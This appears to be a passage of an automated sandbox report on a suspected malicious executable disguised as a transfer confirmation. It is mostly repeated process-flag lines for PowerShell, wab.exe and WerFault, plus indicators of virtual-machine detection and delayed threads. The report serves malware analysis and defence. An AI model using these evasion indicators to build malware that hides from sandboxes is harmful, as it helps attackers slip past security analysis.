      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 5AF4AC9
      Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 21F70000 memory reserve | memory write watchJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 23F70000 memory reserve | memory write watchJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7556Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2106Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6964Thread sleep time: -4611686018427385s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: Amcache.hve.18.drBinary or memory string: VMware
      Source: Amcache.hve.18.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.18.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.18.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.18.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.18.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.18.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: wab.exe, 0000000E.00000002.1925821576.00000000065FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.18.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.18.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.18.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.18.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.18.drBinary or memory string: vmci.sys
      Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.18.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.18.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8]`
      Source: Amcache.hve.18.drBinary or memory string: VMware20,1
      Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.18.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.18.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.18.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.18.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.18.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.18.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.18.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.18.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.18.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
      Source: Amcache.hve.18.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeAPI call chain: ExitProcess graph end nodegraph_0-3516
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeAPI call chain: ExitProcess graph end nodegraph_0-3515
